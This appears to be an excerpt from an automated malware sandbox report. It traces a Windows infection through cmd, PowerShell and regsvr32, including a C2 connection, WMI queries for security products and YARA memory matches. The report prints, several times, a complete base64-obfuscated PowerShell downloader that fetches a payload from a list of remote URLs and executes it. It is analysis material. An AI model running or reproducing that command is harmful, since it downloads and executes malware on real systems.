Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFC65CF3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FFC65CF3280

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.82.82.196 8080
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFC65CF8900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 16_2_00007FFC65CF8900
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFC65CF8860 HeapCreate,GetVersion,HeapSetInformation, 16_2_00007FFC65CF8860

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 0000001D.00000002.506359620.00000210415F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 0000000C.00000002.504391777.0000023BC8A3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000C.00000002.504488461.0000023BC8B02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000C.00000002.504178254.0000023BC8A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.504488461.0000023BC8B02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match File source: 16.2.regsvr32.exe.28c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.regsvr32.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.regsvr32.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.regsvr32.exe.28c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY